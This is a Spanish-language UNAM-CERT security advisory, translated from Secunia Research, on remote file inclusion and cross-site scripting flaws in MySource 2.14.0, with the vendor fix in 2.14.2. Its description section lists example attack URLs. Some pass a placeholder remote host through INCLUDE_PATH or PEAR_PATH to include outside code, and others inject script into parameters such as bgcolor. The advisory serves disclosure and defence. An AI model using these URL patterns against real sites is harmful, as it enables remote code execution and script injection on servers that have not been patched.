1 2 3 4 5 6

Vulnerabilidades rss pdf

Coordinación de Seguridad de la Información - UNAM-CERT -- DGTIC-UNAM

Vulnerabilidad de Seguridad UNAM-CERT-2005-490 Vulnerabilidades de Inclusión de archivos y Cross-site Scripting en MySource.

Se reportarón varias vulnerabilidades en MySource, que pueden explotarse para realizar ataques de Cross-site Scripting y comprometer un sistema vulnerable.

  • Fecha de Liberación: 18-Oct-2005
  • Ultima Revisión: 18-Oct-2005
  • Fuente:

    Secunia Research
    2005-51

  • Riesgo Altamente crítico
  • Problema de Vulnerabilidad Remoto
  • Tipo de Vulnerabilidad Inclusión de archivos

Sistemas Afectados

MySource 2.14.0
  1. Descripción

    Secunia Research reportó varias vulnerabilidades en MySource, que pueden explotarse por personas maliciosas para realizar ataques de Cross-site Scripting y comprometer un sistema vulnerable.

    1. Una de las entradas no es verificada apropiadamente antes de utilizarse para incluir archivos. Esto puede explotarse para agregar archivos arbitrarios desde fuentes internas o externas.

      Ejemplos:

      http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
      http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
      http://[victim]/web/init_mysource.php?INCLUDE_PATH=http://[host]/[file]?
      http://[victim]/pear/Net_Socket/Socket.php?PEAR_PATH=http://[host]/[file]?
      http://[victim]/pear/HTTP_Request/Request.php?PEAR_PATH=http://[host]/[file]?
      http://[victim]/pear/Mail/Mail.php?PEAR_PATH=http://[host]/[file]?
      http://[victim]/pear/Date/Date.php?PEAR_PATH=http://[host]/[file]?
      http://[victim]/pear/Date/Date/Span.php?PEAR_PATH=http://[host]/[file]?
      http://[victim]/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://[host]/[file]?
      http://[victim]/pear/Mail_Mime/mime.php?PEAR_PATH=http://[host]/[file]?
      

      Una explotación exitosa requiere que "register_globals" este habilitado y que los scripts afectados sean accesibles y esten colocados dentro del directorio raiz de Web.

    2. Una entrada no es verificada adecuadamente antes de regresarse al usuario. Esto puede explotarse para ejecutar código HMTL y scripts en el navegador de un usuario dentro del contexto de un sitio afectado.

      Ejemplos:

      http://[victim]/web/edit/upgrade_in_progress_backend.php?target_url=">[code]
      http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?bgcolor=[code]
      http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?bgcolor=[code]
      http://[victim]/squizlib/bodycopy/pop_ups/header.php?bgcolor=[code]
      http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?bgcolor=[code]
      http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?bgcolor=[code]
      http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code]
      

      Una explotación exitosa requiere que "register_globals" este habilitado y que los scripts afectados sean accesibles y esten colocados dentro del directorio raiz de Web.

    Las vulnerabilidades fueron confirmadas en la versión 2.14.0. Versiones anteriores también podrían ser afectadas.

  2. Impacto

    Cross-site Scripting

    Acceso al sistema.

  3. Solución

    El vendedor corrigió las vulnerabilidades en la versión 2.14.2 avisando al usuario durante la instalación del riesgo de seguridad que representa colocar los scripts de MySource en un directorio público y tener habilitado "register_globals".

    Los usuarios deben deshabilitar "register_globals" y asegurarse que la instalación de MySource se mueva del directorio raiz de Web.

    El proceso de instalación fue actualizado en la versión 2.14.2:
    http://mysource.squiz.net/download/downloads/download_2.14.2

  4. Apéndices

    Mayor información.

    http://secunia.com/secunia_research/2005-51/advisory/

La Coordinación de Seguridad de la Información/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:

  • Floriberto López Velázquez (flopez at seguridad dot unam dot mx)

UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
Coordinación de Seguridad de la Información

incidentes at seguridad.unam.mx
phishing at seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel: 56 22 81 69
Fax: 56 22 80 47


Universidad Nacional Autonoma de México Aviso legal |  Créditos |  Staff |  Administración
Copyright © Todos los derechos reservados
UNAM - CERT